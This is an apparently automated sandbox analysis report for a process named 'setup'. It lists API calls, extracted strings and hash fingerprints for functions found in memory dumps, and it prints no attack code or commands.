                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Deleteabort$Leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2046026691-0
                                                                                                    • Opcode ID: 822378b4e43e102482ce67b15edede86e5ec910f9dbbad5064726bcc7b0ec285
                                                                                                    • Instruction ID: b3cfdc4907ab88f6abf596dc8755416b872f083446202a599a6ee231f1412ff5
                                                                                                    • Opcode Fuzzy Hash: 822378b4e43e102482ce67b15edede86e5ec910f9dbbad5064726bcc7b0ec285
                                                                                                    • Instruction Fuzzy Hash: 9B21D4B55187159FC761AFB4D98855EBBF8BF84340F420D3DE88987602EB34A584CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freemalloc$memcpystrlen
                                                                                                    • String ID: PYA
                                                                                                    • API String ID: 3194779595-4183777465
                                                                                                    • Opcode ID: 89c826ca386bb0fc02e1fe5e0e019d65dac986caccadb7a5a1695eefc94faba5
                                                                                                    • Instruction ID: ce1f6433bf754cc3c104751ea9f58362dd77ddf7c6e0b334fb6b1934d2186613
                                                                                                    • Opcode Fuzzy Hash: 89c826ca386bb0fc02e1fe5e0e019d65dac986caccadb7a5a1695eefc94faba5
                                                                                                    • Instruction Fuzzy Hash: D32195B2525B11DFC710AF68D9457DEBBE0FB84320F45842DD88997210D734E954CF4A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen
                                                                                                    • String ID: :%d*%d%s$:m%d$:o%d$:r%d$tta%s%s%s
                                                                                                    • API String ID: 39653677-250652949
                                                                                                    • Opcode ID: 26ad8d28d1891913b6d6019ae5e89c06ffe4848c4f11c6b939b57a402ca57003
                                                                                                    • Instruction ID: a6460a72bed59fe3b306ee7cf55c4f96ef4a09a1f6bfad9be7d4ae5abf366a0a
                                                                                                    • Opcode Fuzzy Hash: 26ad8d28d1891913b6d6019ae5e89c06ffe4848c4f11c6b939b57a402ca57003
                                                                                                    • Instruction Fuzzy Hash: EA21CDB9A1D750DBCB01AF28C58215EBBE4BF84750F62C82EE88C97315C771D8549B82
                                                                                                    APIs
                                                                                                    • GetProcessTimes.KERNEL32 ref: 0020A6D4
                                                                                                    • GetProcessWorkingSetSize.KERNEL32 ref: 0020A7CA
                                                                                                    • GetStartupInfoW.KERNEL32 ref: 0020A845
                                                                                                    • QueryPerformanceCounter.KERNEL32 ref: 0020A882
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CounterInfoPerformanceQuerySizeStartupTimesWorking
                                                                                                    • String ID: D
                                                                                                    • API String ID: 2512491238-2746444292
                                                                                                    • Opcode ID: 0b69eb58ffcc9a70460a88ab4b3a5be580b5b4427aa79dca7526aceda2b025cd
                                                                                                    • Instruction ID: 9c6d88bd55bbace7d12dfdfbe268e82a09895a9a8b6988eea8b04ca56d9b345e
                                                                                                    • Opcode Fuzzy Hash: 0b69eb58ffcc9a70460a88ab4b3a5be580b5b4427aa79dca7526aceda2b025cd
                                                                                                    • Instruction Fuzzy Hash: 8A8183B56183418FDB158F29C89022ABBE1AFDA354F588E3DE8DAD7391D630D9458F03
                                                                                                    APIs
                                                                                                    • acmStreamOpen.MSACM32(00000000,00000000,?,?,00000000,00000000,00000000,00000004,?,0000000C), ref: 00231112
                                                                                                    • acmStreamSize.MSACM32(000000A0,?,000000A0,00000001,000000B0), ref: 0023120E
                                                                                                    • acmStreamSize.MSACM32(?,?,?,00000000), ref: 00231231
                                                                                                    • acmStreamPrepareHeader.MSACM32(00000055,0000004C,00000000,?,?,?,?,?,?,?,0000000C,?), ref: 00231279
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Stream$Size$HeaderOpenPrepare
                                                                                                    • String ID: U
                                                                                                    • API String ID: 1309305768-3372436214
                                                                                                    • Opcode ID: 3aebec9da2091f8da5c1a7a5190f69e28fe4ea25f3959c53b583840ff3cce49d
                                                                                                    • Instruction ID: 64dece05cca0bca8849c67cbc4e38efd268dacf3e2c6c04a771bf4cb902b5c59
                                                                                                    • Opcode Fuzzy Hash: 3aebec9da2091f8da5c1a7a5190f69e28fe4ea25f3959c53b583840ff3cce49d
                                                                                                    • Instruction Fuzzy Hash: 71617BB15147129FD320DF65C88566BF7E4FF88710F10492EF999C6290E3B4D9A4CB92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • (, xrefs: 00250E9A
                                                                                                    • WGL: Unknown pixel format attribute requested, xrefs: 00250E27
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatPixel$Describefree
                                                                                                    • String ID: ($WGL: Unknown pixel format attribute requested
                                                                                                    • API String ID: 4256426571-180673898
                                                                                                    • Opcode ID: d5e787716a895fbbbde66642e93ca89f35213849aa81fdc7ba8dba07fa64c9dc
                                                                                                    • Instruction ID: 763c5d50e8324e30c53ecef06cf62dd4e6d9c2c186bc9b616c3cd8fa8465ec7a
                                                                                                    • Opcode Fuzzy Hash: d5e787716a895fbbbde66642e93ca89f35213849aa81fdc7ba8dba07fa64c9dc
                                                                                                    • Instruction Fuzzy Hash: EA718C702183018FD721DF18D588B9AB7E5FF88309F19896CDD888B351D7B5E8A8CB46
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: calloc$malloc$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1178156143-0
                                                                                                    • Opcode ID: 0bbcf80c210b8c1a5f049748df53499054b1d52d4d637ef5761c06872b20d621
                                                                                                    • Instruction ID: f49cc3cdd7a63c678ad2557afafb78e45948dc4754640d9a88b47058383a89a6
                                                                                                    • Opcode Fuzzy Hash: 0bbcf80c210b8c1a5f049748df53499054b1d52d4d637ef5761c06872b20d621
                                                                                                    • Instruction Fuzzy Hash: 4D5104B0604B01CFDB21DF2AC58465ABBE0FF48304F0589ADE9888B356D7B5D894CF91
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MutexObjectReleaseSingleWait
                                                                                                    • String ID: 9$Install succeeded! Press Start to play or escape to quit.$Start
                                                                                                    • API String ID: 2017088797-1226081799
                                                                                                    • Opcode ID: 29785e8b7bd81b62a3eb70cb13d18bdccebeceb584c10c04fa88ae9b90b7dc1c
                                                                                                    • Instruction ID: cf3600a4a8b7dd307d49c5e096a4b7d751c6cc5fe8aa1373b274cd44f59f0632
                                                                                                    • Opcode Fuzzy Hash: 29785e8b7bd81b62a3eb70cb13d18bdccebeceb584c10c04fa88ae9b90b7dc1c
                                                                                                    • Instruction Fuzzy Hash: 4F412FB4608344DFD304EF28D584B9A7BF1BB58314F52896DE8898B362D774E884CF5A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: exitlongjmpmalloc
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes
                                                                                                    • API String ID: 2723687207-701587655
                                                                                                    • Opcode ID: 15ed0f343d24ce60afebc05c4713b5d4110d6c9af7f412ad6c76cafbb86a4e48
                                                                                                    • Instruction ID: 8aedc367751e3888e079bba45787bceccb9c784542903b7103de6a25fe939667
                                                                                                    • Opcode Fuzzy Hash: 15ed0f343d24ce60afebc05c4713b5d4110d6c9af7f412ad6c76cafbb86a4e48
                                                                                                    • Instruction Fuzzy Hash: F3210BB16183159BD720BF25E44826EBBE0FF45315F55486EE0C88B243C3719CB5DBA2
                                                                                                    APIs
                                                                                                      • Part of subcall function 001EBCC0: mbstowcs.MSVCRT ref: 001EBCDE
                                                                                                      • Part of subcall function 001C27C0: GetFullPathNameW.KERNEL32 ref: 001C27F2
                                                                                                      • Part of subcall function 001C27C0: wcslen.MSVCRT ref: 001C2806
                                                                                                      • Part of subcall function 001C27C0: wcslen.MSVCRT ref: 001C281C
                                                                                                      • Part of subcall function 001C27C0: wcsncmp.MSVCRT ref: 001C2831
                                                                                                    • MessageBoxW.USER32 ref: 001C61C7
                                                                                                    • ReleaseMutex.KERNEL32 ref: 001C61D8
                                                                                                    • CreateProcessW.KERNEL32 ref: 001C62A1
                                                                                                    • CloseHandle.KERNEL32 ref: 001C62B7
                                                                                                    • CloseHandle.KERNEL32 ref: 001C62C3
                                                                                                    • ReleaseMutex.KERNEL32 ref: 001C62E5
                                                                                                    • MessageBoxW.USER32 ref: 001C631F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
